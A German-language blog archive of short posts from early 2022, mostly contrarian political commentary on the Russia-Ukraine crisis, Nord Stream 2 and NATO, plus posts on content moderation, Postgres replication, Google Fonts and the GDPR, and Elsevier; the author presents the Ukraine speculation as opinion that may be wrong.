Vor ein paar Tagen hat Ria Novosti angeblich einen Artikel veröffentlicht, in dem sie das Ende der Kampfhandlungen verkündet und den Kreml für seinen Erfolg gefeiert haben. Als dann jemandem auffiel, dass das verfrüht war, haben sie angeblich den Artikel weggemacht. Aber wisst ihr was? Niemand hat eine URL, keiner hat ein Backup des Artikels, im Google Cache oder auf archive.org ist er auch nicht. Weil Anonymous Feindmedien bekämpft. Ja super.
Im Übrigen möchte ich mal die Frage in den Raum stellen, wie ihr das sehen würdet, wenn russische Cyber-Kiddies unsere Zeitungen wegballern würden, wie es Anonymous gerade mit Russland macht? Fändet ihr, dass das vertretbar ist? Guckt mal, was Reporter ohne Grenzen zu Angriffen auf Medien sagt. Wenn ihr da mitmacht, dann solltet ihr euch was schämen.
Update: Oh, da hatte ich wohl Tomaten auf den Augen. Es gibt doch den Ria-Novosti-Artikel auf archive.org. Bei mir kamen immer nur Screenshots vorbei (was ich ja eine absolut entsetzliche Angewohnheit finde, und das nicht nur weil es Blinde ausschließt).

Thu Feb 24 2022

[l] Liebe Leser, ich hab euch alle gerne und mache das hier für euch, aber ab und zu geht ihr mir gewaltig auf den Sack. Daher ist jetzt Zeit für eine Runde Publikumsbeschimpfung.
Nein, ich war kein Putin-Fan. Nein, ich habe Putin nicht verteidigt. Nein, ich habe nicht gesagt, die Nato sei Schuld.
Mein Anspruch mit diesem Blog ist nicht, euch die Wahrheit zu sagen. Ich bin ein alter Mann vor einem Bildschirm. Ich kann mir nicht anmaßen, die Wahrheit auch nur zu erkennen, wenn sie mich in den Arsch kneift.
Mein Anspruch ist, dass ihr für eure Meinungsbildung die Argumente beider Seiten gehört habt. Das sind insbesondere die Argumente, die von der anderen Seite in Gänze weggewischt werden.
Wenn der Diskurs von Querdenker-Kram geflutet wird, gibt es bei mir Anti-Querdenker-Kram.
Wenn der Diskurs von Nato-Propaganda geflutet wird, gibt es bei mir Anti-Nato-Kram.
In meinem Weltbild agieren zumindest moderat schlaue Menschen, um Ziele zu erreichen, die sie möglicherweise nicht klar artikulieren vorher, oder manchmal gar ganz verschleiern oder geheimhalten.
Niemand tut etwas, um der Bösewicht zu sein. In seinem eigenen Film ist jeder der Held. Wenn du also verstehen willst, wieso jemand etwas tut, dann musst du seinen Film verstehen. Daher meine Versuche, Putins Film zu verstehen.
Natürlich kann ich da auch nur vermuten. Es ist aber wie gesagt nicht mein Ziel, euch nur die Dinge zu sagen, die ich für die Wahrheit halte. Mein Ziel ist, dass ihr auch die Argumente der anderen Seite gehört habt.
Bis heute morgen konnte ich Argumente finden, die Putins Verhalten rational erklärt haben, daher habe ich sie euch in diesem Blog mitgeteilt. Wohlgemerkt: Erklärbar. Das heißt nicht, dass ich Putins Handeln zu irgendeinem Zeitpunkt vertretbar fand. Ich bin Pazifist. Alle Handlungen, die mit Waffen zu tun haben, außer Abrüsten und Entsorgen finde ich nicht vertretbar.
Aber wie gesagt geht es hier nur am Rande um meine Meinung. Es geht darum, dass ihr euch eure Meinung nicht nur aufgrund von Argumenten einer Seite bildet.
Das zweite Ziel meines Blogs ist es, niemanden mit Kritik an Anderen durchkommen zu lassen, für Dinge, die er selber macht. Und da sind die EU, Deutschland, die Nato und die USA halt sehr dankbare Ziele. Praktisch alles, was die anderen vorwerfen, haben sie vorher selber gemacht.
Sind die von mir hier verbreiteten Argumente manchmal falsch? Aber ja! Wie gesagt ist es explizit kein Kriterium, ob ich die Argumente selber für wahr halte. Die Meinung sollt ihr euch ja bilden, nicht ich euch. Und selbst wenn ich die Argumente für wahr hielte, heißt das ja nicht, dass ich das ernsthaft beurteilen oder prüfen kann. Daher maße ich mir das gar nicht erst an.
Gelegentlich kommt es vor, dass meine Erklärungen für irgendwas voll daneben liegen. So ist das halt im Leben. Ich bin mit meiner Quote ehrlich gesagt ziemlich zufrieden bisher.
Warum blogge ich das? Weil ich aktuell um die 30 Mails in der Inbox habe, ich solle mich entschuldigen. Entweder von Querdenkern, weil in der "Welt" hinter einer Paywall irgendwas über angebliche Impfnebenwirkungen steht, oder jetzt halt wegen der Ukraine, wo ich gesagt habe, der Putin wird nicht einmarschieren.
Was glaubt ihr eigentlich, wer ihr seid?! Knapp die Hälfte dieser Mails kam von extra dafür angelegten Wegwerfaccounts bei Kostenlos-Mail-Hostern. Ich nehme an, weil ich den Voraccount im Filter habe. Das ist unter meinen Lesern nur eine verschwindend geringe Minderheit. Aber sie verschwenden deutlich über Gebühr kognitive Ressourcen bei mir.

Tue Feb 22 2022

[l] Oh, na super. Olaf Scholz stoppt die Genehmigung für Nord Stream 2.
Na DA haben wir es dem fiesen Russen aber mal so richtig gezeigt! Wenn wir jetzt unser Gas lieber auf dem Spotmarkt zu Preisen Faktor 5 über den alten Verträgen mit den Russen kaufen! Meine Güte, haben wir es den Russen da gezeigt!
Was sagst du? Die alte Pipeline gibt es auch noch und die war noch nicht an ihrer Kapazitätsgrenze? Äh. Na siehst du mal, wie sehr wir es dem fiesen Russen gezeigt haben!!
Guck mal, es geht doch nicht um das Gas, wenn wir es dem Russen zeigen. Es geht um die Investitionen, die sie gemacht haben, die jetzt alle wertlos sind!
Welche Investitionen? Na googeln wir doch mal. Hier ist was. Capex (capital expenditure, investiertes Kapital): 8 Milliarden Euro. Fully privately funded investment.
Seht ihr? Privat! Den privaten Russen haben wir es aber gezeigt!
Financial investors: ENGIE S.A., OMV AG, Royal Dutch Shell plc, Uniper SE and Wintershall Holding GmbH. Each company will fund up to 950 million euros
Lange habe ich nicht mehr so russische Russen gesehen, denen wir es mal so richtig gezeigt haben!
Was sagt ihr? Die werden sich jetzt ihre Investitionen vom EU-Steuerzahler zurückholen? Das können die machen, weil sie in der EU sitzen? Boah diese fiesen Russen immer! Sitzen die in der EU, die fiesen Russen! Also mit soviel Heimtücke und Hinterlist konnte ja wohl niemand rechnen! Ja gut, aber wenigstens die Holding sitzt in Russland, hoffe ich? Wenigstens die wird sich nicht die Kohle vom deutschen Steuerzahler zurückklagen? Naja, äh, die sitzen in Südwestrussland:
The company is based in Zug, Switzerland
Na so ein Ärger.
Ja ok, aber die Mehrheit gehört immer noch Gazprom. Denen haben wir es aber gezeigt, den fiesen Gazprom-Russen!
Ja, haben wir. Ich bin mir sicher, dass die sich das keinesfalls über die Gaspreise von uns zurückholen werden. Das wäre ja unethisch.
Seid ihr eigentlich auch so froh, dass wir von so kompetentem Personal verwaltet werden? Endlich mal ein kraftvoller Kanzler, der es den Russen mal so richtig gezeigt hat!
Update: Aber warte mal, wenn sich eine Schweizer Firma aus Deutschland Geld zurückholen will, das ist doch bestimmt nicht so einfach. Deutlich schwieriger jedenfalls, als wenn das eine deutsche Firma wäre. Da habt ihr natürlich völlig Recht.
Darf ich an dieser Stelle kurz darauf hinweisen, dass Nord Stream 2 eine deutsche Tochterfirma gegründet hat, weil die Bundesnetzagentur sonst nicht zertifizieren wollte? Das ist jetzt ein bisschen doof gerade.
Update: Oder, wie es Dimitri Medwedjew sagt:
Herzlich willkommen in einer neuen Welt, wo die Europäer bald schon 2000 Euro pro Kubikmeter Gas zahlen werden!
Update: Falls euch 2000 Euro pro Kubikmeter ein bisschen viel vorkommen: Das ist zwar der offizielle Medwedjew-Account, aber der Tweet auf Deutsch hat einen Übersetzungsfehler. Auf Englisch sind es 2000€ pro 1000 Kubikmeter. Das ist natürlich immer noch krass teuer aber immerhin drei Größenordnungen weniger teuer.

Fri Feb 18 2022

[l] Habt ihr das auch gehört? Das stimmt gar nicht, dass der Westen der zerbrechenden Sowjetunion versprochen hat, eine Nato-Osterweiterung sei ausgeschlossen?
Nun, ... ihr müsst jetzt sehr tapfer sein.
Bonns Vertreter Jürgen Chrobog erklärte damals laut Vermerk: „Wir haben in den Zwei-plus-Vier-Verhandlungen deutlich gemacht, dass wir die Nato nicht über die Elbe hinaus ausdehnen. Wir können daher Polen und den anderen keine Nato-Mitgliedschaft anbieten.“
Auch Briten, Franzosen und Amerikaner lehnten eine Nato-Mitgliedschaft der Osteuropäer ab. US-Vertreter Raymond Seitz sagte: „Wir haben gegenüber der Sowjetunion klargemacht – bei Zwei-plus-Vier- wie auch anderen Gesprächen –, dass wir keinen Vorteil aus dem Rückzug sowjetischer Truppen aus Osteuropa ziehen werden.“ Zwei Jahre später korrigierten die Amerikaner ihre Politik.
Ach. Ach was.
Ich dachte der Putin sei hier der habituelle Lügner und der Westen sei voll vertrauenswürdig und so?
Auf der anderen Seite ist das bestimmt wie bei Korruption. Da heißt es ja auch immer, Russland werde von korrupten und kriminellen Oligarchen kontrolliert, die sich selbst mit unlauteren Methoden aus der Strafverfolgung heraushalten.
Update: Beim Spiegel ist die Nato-Story hinter einer Paywall, aber dieses Foto der relevanten Passage nicht.
[l] Im Moment gehen im Netz angebliche Artilleriebeschüsse im Donbass herum. Angeblich ein Kindergarten in Lugansk.
Da könnt ihr mal einen drauf lassen, dass das nicht die Russen waren. In Lugansk wohnen russische Rebellen. Die beschießen sich doch nicht selbst, und schon gar nicht einen Kindergarten mit ihren eigenen Kindern drin.
Ich muss daher spontan an die Kubakrise denken, denn da kam ja die Idee für die Raketenstationierung nicht von den Sowjets sondern von Fidel Castro. Der wusste, dass er und seine Insel dann als erstes ausgelöscht würden im Kriegsfall und wollte die Raketen trotzdem da haben.
Ich vermute, dass die Ukraine das gerade genau so macht. Nachdem die Amis seit Wochen vor angeblichen False-Flag-Operationen der Russen warnen, kann die Ukraine praktisch beliebige Aktionen machen, und dann immer einfach sagen: War ne False Flag der Russen!1!!
Die Frage ist, wie die Russen auf sowas reagieren. Eine Invasion ist nach wie vor ausgeschlossen glaube ich.
Übrigens lässt sich die Ukraine von Michail Saakaschwili beraten, dem Ex-Präsidenten von Georgien. Da lief das ja damals sehr ähnlich. Georgien hat nach Abchasien reingeschossen und dann haben die Russen halt eine Invasion gemacht. Ich vermute mal, der Saakaschwili denkt sich, er kriegt die Russen wieder zu einer Invasion provoziert.
In Georgien lief das ja nicht so gut für Saakaschwili. Wir hatten den ja mal im Fnord-Jahresrückblick, weil er mit dem Machtpoker etwas überfordert war damals und dann nervös auf seiner Krawatte herumkaute.
Update: OK, ich gebe es zu. Ich habe Saakaschwili erwähnt, um das Krawattenvideo nochmal unter die Leute zu bringen. Der Mann sitzt in Georgien im Knast gerade.

Thu Feb 17 2022

[l] Ab und zu, sehr selten, gibt es hier auch mal positive Meldungen. Heute ist so ein Tag.
Als das Netzdurchsetzungsgesetz eingeführt wurden, waren die Befürchtungen apokalyptisch. Das ist eine Zensurinfrastruktur, die Machthaber werden jetzt jeden Scheiß wegzensieren, etc pp. In der Praxis ist die Jauchegrube nicht viel flacher geworden. Jetzt hat die Freiwillige Selbstkontrolle Multimedia-Diensteanbieter Bilanz gezogen und dabei einige bemerkenswerte Entscheidungen veröffentlicht.
Da ging es um Holocaust-Relativierungen von Leerdenkern, die Dinge wie "Impfen macht frei" posteten, und vor einer drohenden Markierung Ungeimpfter mit Judensternen warnten. Das werteten die Prüfer als furchtbar und ekelig aber gerade noch von der Meinungsfreiheit gedeckt.
Dann ging es um einen Rap-Song mit Zeilen wie "Ich will Politiker töten und die Schulsysteme stürzen" und "Ich box Alice Weidel quer durchs Gesicht und nenn das genderspezifische Gesellschaftskritik". Auch da sahen die Prüfer (für mich deutlich weniger überraschend) keinen Anlass für Zensur.
Es gab aber auch eine rote Linie: Wenn die Polizei beleidigt wurde. Das war dann wohl der Wink mit dem Zaunpfahl, damit die Politik nicht sagen kann, das sei bloß ein Bullshit-Gremium, das alles zulässt.
Wartet, geht noch weiter. Facebooks neues Oversight Committee hat vier von fünf vorgelegten Fällen rückgängig gemacht, u.a. ein angebliches Göbbels-Zitat, und, noch viel überraschender und schockierender: Nackte Brüste! Es ging auf den Bildern um Brustkrebs-Vorsorge, aber das war dem Nippel-Erkenn-System Facebooks natürlich egal, und menschliche Nachprüfung gibt es da nicht. Außer halb dem Oversight Committee.

Mon Feb 14 2022

[l] Kennt sich hier zufällig jemand mit Postgres-Clusterkram aus?
Ich lese gerade die Dokumentation von Postgres und tappe von einer krassen Einschränkung zur nächsten.
Synchrone Multimaster Replikation? Können wir nicht.
Logische Replikation? Kann keine Blobs und verliert bei Sequences den Zähler.
Der Hinweis, dass man das ja in der Anwendungslogik drumherum implementieren kann, kommt mir ziemlich zynisch vor. Das ist untrivialer Kram! Gerade weil das so untrivial ist, will man ja, dass die Datenbank das macht, die hoffentlich von Spezialisten und Profis entwickelt wurde, und nicht mein Anwendungscode, der von einem relativen Datenbank-Laien gemacht wird, der wahrscheinlich Fehler macht.
Bei der Gelegenheit ist mir aufgefallen, dass alle großen Datenbank-Cluster, mit denen ich beruflich ein bisschen näher rankam, MySQL-basiert waren. Jetzt weiß ich glaube ich auch, warum das so war.
Die Frage ist jetzt, wie andere Leute um diese Probleme herumgearbeitet haben. Hattet ihr einfach eine Anwendung, die von diesen Tretminen nicht betroffen war?
Ich stelle mir jetzt hier gerade Schnellschuss-Lösungen vor wie dass man einen Autoinkrement-Zähler dann halt über eine Stored Procedure implementiert.
Ich bin aber ehrlich gesagt gerade ziemlich erschüttert. Ich nahm an, Postgres ist alt und gut abgehangen und da funktioniert Replikation einfach.
Was ist denn da Best Practices? Manuell oder halbmanuell monitoring und dann nachjustieren? Baut sich da jeder eigene Skripte?
Update: Hey, komm, packen wir halt den Autoinkrement-Zähler in einen Redis! Oh nee, warte:
Redis Cluster is not able to guarantee strong consistency. In practical terms this means that under certain conditions it is possible that Redis Cluster will lose writes that were acknowledged by the system to the client.
o_O
Update: Die ersten Kommentare empfehlen CockroachDB.
Update: OK, ein paar mehr Details. Es geht mir hier nicht um Views oder Likes zählen, sondern um das Zustandekommen von Verträgen. Wenn ich bestätige, dass der Vertrag zustandekam, dann muss der auch da sein und die Transaktion kann nicht versehentlich hinter das Regal fallen. Wenn dafür die Schreiblatenz hochgeht, dann ist das halt so. Es geht nicht um Lastverteilung, nur um Ausfallsicherheit.

Sat Feb 12 2022

[l] Ist das hier (Absatz 33, ganz am Ende) so eine krasse Ohrfeige, wie es sich für mich als Laie liest?
Das Bundesverfassungsgericht sagt:
Der wiederholte Verstoß des Pressesenats des Oberlandesgerichts gegen das Gesetz der Waffengleichheit bei einstweiligen Anordnungen gibt Anlass, auf die rechtliche Bindungswirkung der Entscheidungen des Bundesverfassungsgerichts hinzuweisen (§ 31 Abs. 1, § 93 c Abs. 1 Satz 2 BVerfGG, dazu BVerfG, Beschluss der 1. Kammer des Ersten Senats vom 27. Januar 2006 - 1 BvQ 4/06 -, Rn. 26 ff.). Bei zukünftigen Verstößen gegen die Waffengleichheit durch den Senat wird die Kammer ein Feststellungsinteresse für eine Verfassungsbeschwerde oder einen Antrag auf einstweilige Anordnung gemäß § 32 BVerfGG stets als gegeben ansehen.
Das liest sich für mich, als hätten die Richter die Schnauze echt gestrichen voll davon, ständig die Hamburger zurückrufen zu müssen, weil sie mal wieder Klientelrechtsprechung gemacht haben, damit die Promis alle bei ihnen klagen. (Danke, Lukas)
[l] Die USA evakuiert ihre Botschaft in Kiew. Vorher hatten sie Amerikaner in der Ukraine zum Verlassen des Landes aufgerufen.
Auch die Bundesregierung ruft Deutsche zum Verlassen der Ukraine auf.
Alle draußen? Dann kann Russland ja loslegen!
Update: Auch die Briten haben ihre Leute zum Verlassen der Ukraine aufgerufen.
Es wirkt ein bisschen so, als wolle der Westen Putin in eine Invasion hineinmanipulieren. Schau her, Putin, wir haben alles weggemacht, was im Weg stand!
Update: Hierzu kamen einige "Du Aluhut"-Kommentare rein. Stimmt, das ist sehr spekulativ. Aber hört mir mal bitte kurz zuende zu.
Was ist das Psychogramm von Putin im Westen? Jemand, der mit nacktem Oberkörper auf einem Bären durch Sibirien reitet, weil er dringend Kraft und Männlichkeit ausstrahlen muss. Der Westen leugnet ja konsequent jedwedes legitime Interesse Russlands an Sicherheits-Zusagen oder gar existenzielle Bedrohungsgefühle, obwohl wir es hier mit einer Cuban Missile Crisis in grün zu tun haben. Wo die Nato hinzieht, installieren sie amerikanische Militärbasen mit Raketenabwehr (Polen) oder Angriffsraketen (Türkei), immer in Richtung Russland.
Wenn der Westen also Russlands angebliche Expansionsgelüste Richtung Ukraine sieht, dann sieht er Imperialismus. Denn was ich gerne selber tu, das trau ich auch den anderen zu.
Ich halte ja die angeblichen Invasionsgelüste immer noch für ein Propaganda-Phantom des Westens. Russland hat vielleicht das Militär, um die Ukraine zu erobern, aber nicht die Mittel, um die danach zu stabilisieren und aufzupäppeln. Aus meiner Sicht hofft Russland gerade, einen Nato-Anschluss der Ukraine wegzubluffen zu können, ohne dass dafür ein einziger Schuss fallen muss.
OK, wenn aber der Westen an eine Invasion durch Russland glaubt, und das für Imperalismus oder Machtdemonstration hält, dann ist aus Sicht des Westens (unter der Annahme, dass alle Zusagen gegenüber der Ukraine Lippenbekenntnisse waren und der Westen auf das Schicksal der Ukraine scheißt) eine gute Strategie, Russland zur Invasion zu bewegen. Schritt 1: Provokationen. Die habt ihr ja selber beobachtet. Was da alles erklärt wurde über den fiesen Putin und die bösen Russen. Wenn ihr das nicht beobachtet habt, dann weil über Russland eh immer nur negative Dinge in den Medien kommen.
Schritt 2: Glaubwürdig Schwäche zeigen, Putin signalisieren, dass man die Ukraine nicht verteidigen wird. Das sehen wir hier gerade. Auch Deutschlands Weigerung für Waffenlieferungen passt hier gut, auch wenn ich gehofft hatte, dass das Rudimente von Grünen-Pazifismus war und nicht Nato-Strategie. Hab ich mich wohl geirrt.
Die Idee, die Russen zu besiegen, indem man sie irgendwo einmarschieren lässt, ist nicht neu. Erinnert euch an Afghanistan.
Ich glaube, die Nato hofft gerade, dass sie Putin zum Einmarsch zwingen kann, indem sie es so aussehen lässt, als sei Putins Bluff der Anlauf zu einer Machtdemonstration gewesen, und wenn der jetzt unverrichteter Dinge umdreht und weggeht, dann ist das aus dieser Perspektive ein fatales Signal der Schwäche und könnte ihn innenpolitisch das Amt kosten. Da unterschätzt die Nato glaube ich die innenpolitische Kontrolle des Kreml über die russischen Medien.
Dass Putin überhaupt so einen PR-Hebel gegen Russland zulässt, irritiert mich gerade ein bisschen. Vielleicht war der Plan, die Ukraine über Zudrehen des Gashahns zum Nato-Abdanken zu zwingen, aber jetzt wo die Amerikaner erfolgreich die Inbetriebnahme von Nord Stream 2 verzögert haben, ist der Winter schon wieder fast vorbei (und außerdem recht mild) und Russland kann den Gashahn nicht zudrehen, weil über den Hahn auch die Versorgung Deutschlands und der EU läuft, und die Ukraine dann einfach wie bisher Gas entnehmen kann für ihren Eigenbedarf.
Update: Ach schau, Putin glaubt auch, dass Nato Russland in einen Krieg ziehen will.
So demonstrativ, wie die westlichen "Freunde" gerade die Ukraine am langen Arm verhungern lassen, frage ich mich ja, ob in Kiew hinter verschlossenen Türen darüber nachgedacht wird, sie lieber wieder Russland anzuschließen. Wenn da nicht der Donbass und dieser Flugzeugabschuss gewesen wäre ...!

Wed Feb 9 2022

[l] Ein Warburg-Banker ist wegen Cum-Ex zu einer Haftstrafe verurteilt worden.
Ich ärgere mich ja jedes Mal, wenn die Medien dann bei sowas "Ex-" oder "ehemaliger" schreiben. Als er das gemacht hat, hat er da gearbeitet. Wir reden hier nicht von jemandem, der zufällig später in seinem Lebenslauf auch mal bei Warburg gearbeitet hat.
Jedenfalls ... Die Details klingen für mich nach einem Bauernopfer. Man hat einen Sündenbock gefunden und der geht jetzt für die Bank in den Knast.
Der ist nicht mal der, der sich das Schema ausgedacht hat. Der war bloß Analyst und hat es abgenickt. Der hat sich nicht mal persönlich bereichert dadurch. Oh, und: Er ist 63.
Hey, Cheffe, haben wir nicht jemanden, der eh demnächst in Rente gegangen wäre? Den da drüben? Gut. Den schicken wir dann mal in den Knast.

Sat Feb 5 2022

[l] Russland und China rücken enger zusammen.
Russland hält China in Sachen Taiwan den Rücken frei, und China steht in Sachen Ukraine zu Russland.
Früher hatten die Amis ja mal Leute, die sich mit Geostrategie beschäftigt haben. Zbigniew Brzeziński hat sich da umfangreiche Gedanken gemacht und das einflussreiche Buch The Grand Chessbaord geschrieben, in dem er Eurasien als Zentrum der Macht sieht und daher für die USA eine Politik vorschlägt, die das Ziel hat, die Kräfte in Eurasien davon abzuhalten, sich zusammenzutun.
Brzezinski hat explizit vor einer Koalition von Russland und China gewarnt, eventuell auch noch mit dem Iran dabei. Die aktuelle Außenpolitik der USA sieht gerade so aus, als wollte sie genau das herbeiführen.

Wed Feb 2 2022

[l] Die Ausstrahlung von RT Deutsch ist jetzt verboten worden.
Gute Arbeit, Russland. Ihr habt es geschaft, solange zu provozieren, bis euch Youtube rauswarf, und dann habt ihr solange weitergemacht, bis das hier passierte. Jetzt könnt ihr eure Propaganda weiterfahren, dass in Deutschland Zensur herrscht und die Wahrheit unterdrückt wird. Habt ihr ein Glück, dass unsere Behörden so vorhersagbar sind.
Gratulation auch an die Behörden an der Stelle. Ihr habt es geschafft, RT Deutsch auch noch Wind in die Segel zu pusten. Euch selbst habt ihr dabei so demaskiert, dass eure Hosen jetzt bis zur nächsten Revolution nach Pisse stinken. Das kriegt man auch nicht rausgewaschen. Ja, so tief habt ihr ins Klo gegriffen.
Die Älteren unter euch werden sich noch an Zeiten erinnern, wo bei uns Demokratie simuliert wurde. Man hat geguckt, was die Mehrheit will, und das hat man dann gemacht. Es gab natürlich Ausnahmen für verfolgte ethische Minderheiten und so. Und wisst ihr was? So gut wie nie waren die Mehrheiten so klar wie jetzt. Wenn du nur auf die Impfbaren guckst, haben wir eine Impfquote von 80%. Ich kann mich gar nicht erinnern, wann es zuletzt für irgendeine Frage jemals so eine klare Mehrheit gegeben hat.
Die Querdenker sind keine verfolgte oder diskriminierte Minderheit. Die sind einfach eine Minderheit. Die haben verloren. Aber sind zu sehr Kleinkind, um ihre Niederlage hinzunehmen.
Nicht zuletzt durch die Dauer-Agitation von RT Deutsch wähnen sich viele von denen sogar im Recht mit ihrem kleinkindlichen Trotzverhalten.
Das laste ich aber nicht RT an. Das ist Schuld der Idioten, die auf deren Agitprop reingefallen sind (und die war nicht mal besonders gut oder überzeugend!) und auf die Politik, die sich hier von einer verschwindend kleinen Minderheit als ängstliche Hühner vorführen lässt, geradezu paralysiert vor Angst, obwohl die Wahl gerade frisch hinter uns liegt und die jetzt 4 Jahre durchregieren können!
Kleine Übung: Googelt mal, wie viele Menschen in Deutschland an Gespenster glauben. In einer Gesellschaft der Größe unserer Bevölkerung gibt es schlicht eine bestimmte Anzahl von Spinnern. Das ist die Zahl, mit wie vielen Spinnern unsere Demokratie umgehen können muss.
Übung 2: Findet mal raus, wieviel Prozent die Parteien bei der Wahl tatsächlich gekriegt haben. In den offiziellen Wahlergebnissen werden die Nichtwähler rausgerechnet. Rechnet die mal wieder rein.
Das setzt einiges in Perspektive, findet ihr nicht?
[l] Lacher des Tages: Elsevier: Unser Tracking ist Ransomware-Schutz!
Wenn hier einer kassiert, für anderer Leute Arbeit, und zwar sowohl von Konsumenten als auch Produzenten, dann ist das Elsevier!
Aus Sicht eines Forschers bei einer Uni hat Elsevier in der Ransom-Branche auch die älteren Rechte. Schöne Forschung haben Sie da! Wäre ja schade, wenn die nicht in einem Journal publiziert wäre!
Schöne Forschung haben Ihre Mitarbeiter da gemacht! Wäre ja zu schade, wenn Ihre anderen Forscher die Papers nicht lesen könnten, weil Sie kein Abo bei uns abgeschlossen haben!
Und wer bezahlt den Peer Review? Jedenfalls nicht Elsevier, soviel ist klar. Ausgaben schmälern den Profit!

Tue Feb 1 2022

[l] Hey, psst, was glaubt ihr, was unsere Energiemafia seit Oktober gemacht hat?
Andere Gasquellen aufgetan? Auf dem Spotmarkt Gas gekauft und in die Reserven gepumpt? Nicht noch mehr Gas aus den Reserven auf dem Spotmarkt zur Profitmaximierung verscheuert?
Wenn ihr auf d) Nichts dergleichen getippt habt, dann liegt ihr natürlich völlig richtig. Die Reserven sind jetzt unter der kritischen Marke. Welche kritische Marke ist das? Na die "wenn es hier eine ausgedehnte Kältewelle gibt, dann erfrieren Leute"-Schwelle.
Aber hey, macht euch keine Sorgen. Ich bin mir sicher, privat haben die Manager bei den Energiekonzernen vorgesorgt. Von denen muss keiner frieren.
Übrigens, völlig unabhängig davon. Nehmt mal kurz an, ihr seid die USA. Ihr wollt den Deutschen euer Frackinggas verkaufen, aber die Russen liefern billiger und zuverlässiger und die müssen ihr Gas nicht verflüssigen und auf Schiffe laden, die haben eine Pipeline. Sogar eine ganz neue Pipeline durch die Ostsee, bei der Polen, die Ukraine und Weißrussland nicht auf dem Weg, äh, "Transitgebühren" abzweigen können. Ihr seid jetzt General Feuerfrei und es ist euer Job, den perfekten Termin zu finden.
Was wären eure Kriterien?
1. Gerade war Wahl und die jetzige Regierung ist in Duldungsstarre, hat sich so tief im Rektum der USA eingebuddelt, dass ihr sie gar nicht mehr fragen müsst, bevor ihr in ihrem Namen Dinge verkündet.
2. Die Nato hat sich unter irgendeinem Vorwand in einen Konflikt zwischen der Ukraine und den Russen involviert, und das kann man vielleicht nutzen. Man müsste nur vorsichtig vorgehen, damit die Nato nicht abspringt, sobald es aussieht, als müsste sie mal leisten statt wie sonst immer nur zu fordern. Die Gefahr ist nicht sehr hoch, denn die Nato steckt praktisch komplett unter der Kontrolle der USA. Die Nato ist ungefähr so unabhängig von den USA wie die Hisbollah vom Iran.
3. der Gaspreis ist auf Rekordniveau, nicht zuletzt weil ihr seit geraumer Zeit die Inbetriebnahme der neuen russischen Ostseepipeline behindert habt. Außerdem habt ihr der EU gesagt, sie soll mal ihre Abhängigkeit von den Russen senken, und Sesselfurzer in der EU haben daraufhin ihre Langfrist-Verträge auf Kurzfrist-Verträge umgestellt und kaufen jetzt in Deutschland, nicht direkt bei den Russen. Dass Deutschland am Ende auch bloß von den Russen kauft, ist ja nicht das Problem der anderen Länder!1!! Daraufhin stieg die Nachfrage und damit der Preis, und auf die deutschen Energiekonzerne war Verlass. Die haben ihre eisernen Reserven meistbietend versteigert und sitzen jetzt mit leeren Lagern da.
Einen so perfekten Sturm haben wir glaube ich noch nie gehabt. Es könnte gar nicht besser laufen für die Amis.
BTW: Falls hier jemand glaubt, der Vorwand der Truppenanhäufung auf russischem Boden sei kein Bullshit-Vorwand: Stellt euch mal kurz vor, Mexiko riefe China zu Hilfe, weil die Amis auf ihrem eigenen Staatsgebiet hinter der Grenze Soldaten zusammenzögen. Soll das ein fucking Witz sein? Über das Szenario denkt gar keiner nach, so absurd ist das. Die Amis ziehen regelmäßig Soldaten zusammen, aber auf anderer Länder Grund und Boden. Und nichtmal dagegen wagt irgendjemand was zu sagen!
Erinnert euch mal kurz an die Kubakrise. Da war Kuba grob in der Lage, in der die Ukraine jetzt ist. Die fühlten sich bedroht und wollten daher aufrüsten. Und nicht nur war es völlig undenkbar, dass Kuba den USA Abrüstung in die Politik diktiert, wie es gerade die USA mit den Russen versuchen. Nein. Die USA haben Kuba behandelt, als sei es ihr eigenes Staatsgebiet. Ungefähr so, wie die Russen jetzt laut verzerrter Propaganda des US-Militärs angeblich die Ukraine als ihr eigenes Gebiet betrachten. Nach Präzedenzfall Kubakrise wäre das völlig gerechtfertigt, wenn es so wäre. Ist es aber nicht.
Ich halte das übrigens auch für absurd, dass die Russen die Ukraine haben wollen. Alles, was die wirklich dringend behalten wollen, ist die Krim, weil dort ihr wichtigster Marinestützpunkt ist, der auch im Winter nicht zugefroren ist. Und, wie ich damals schon schrieb, sind ihre vertraglich zugesicherten Ansprüche auf die Krim älter als die Vereinigten Staaten von Amerika.
Sie hätten gerne, dass die russische Minderheit im Osten der Ukraine nicht von der Ukraine drangsaliert wird. Wenn die Ukraine da Zusicherungen gemacht hätte, wäre es m.E. nie zu einer militärischen Eskalation gekommen. Im Gegenteil wäre es glaube ich aus Sicht der Russen die beste Lösung, wenn die Ukraine sich der EU anschließt, aber der Nato fernbleibt. Dann bekäme die Ukraine ein Infrastrukturprogramm und wäre wieder liquide, müsste kein Erdgas mehr von den Russen stehlen, sondern könnte im Gegenteil dort schön einkaufen. Win-Win-Win. Die Ukraine zu übernehmen wäre in ihrem aktuellen Zustand für die Russen ein Verlustgeschäft, das sie sich nicht leisten können. Und so, wie die Ukrainer über die Russen hergezogen sind, wäre das vermutlich auch in Russland keine populäre Option.

Sat Jan 29 2022

[l] Das LG München findet, die Einbindung von Google Fonts bricht die DSGVO.
Ich persönlich bin ja Google Fonts dankbar. Die haben eine schöne Sammlung gemacht, und uns einige gute neue Schriften geschenkt. Mein Terminal-Standardfont ist Roboto Mono. Ich bin denen auch dankbar, dass man ihre Schriftarten alle runterladen kann.
Aber von der Intention der DSGVO her würde ich mich grundsätzlich dem LG München anschließen.
Hat leider auch Nachteile, wenn jeder selber seine Fonts hostet. Google z.B. guckt, von welchem Betriebssystem du kommst, und liefert nur für Windows Hinting-Daten aus, was anderswo die Downloads kleiner macht. Außerdem kann der Browser theoretisch die Schriftarten cachen, wenn alle dieselbe Datei von Google einbinden. Das geht nicht, wenn jeder eine eigene Kopie davon hostet.
Das sind halt die Nachteile, die man in Kauf nimmt, um nicht von Google getrackt zu werden.
Wäre nett, wenn jemand ein Non-Profit für gemeinsames Font-Hosting gründet, das keine Daten loggt. Die Frage ist, welchem Land man da als Standort überhaupt noch trauen kann. Island vielleicht?
Update: Praktisch cachen die Browser 3rd party Ressourcen vom CDN AFAIK schon eine Weile nicht mehr, weil man über das Timing Rückschlüsse über den User ziehen konnte, die die Datenschutzanforderungen verletzt hätten.
[l] Der Bundesjustizminister hat eine tolle Idee. Wenn man es nicht schafft, Telegram ein offizielles Bußgeldschreiben zuzustellen (deren "Sitz" ist in Dubai), dann ... könnte man doch einfach die Bußgeldnote im Bundesanzeiger veröffentlichen!1!!
Und dann sagt man einfach: Ist zugestellt.
Wie man dann die Kohle eintreibt? Klären wir später!
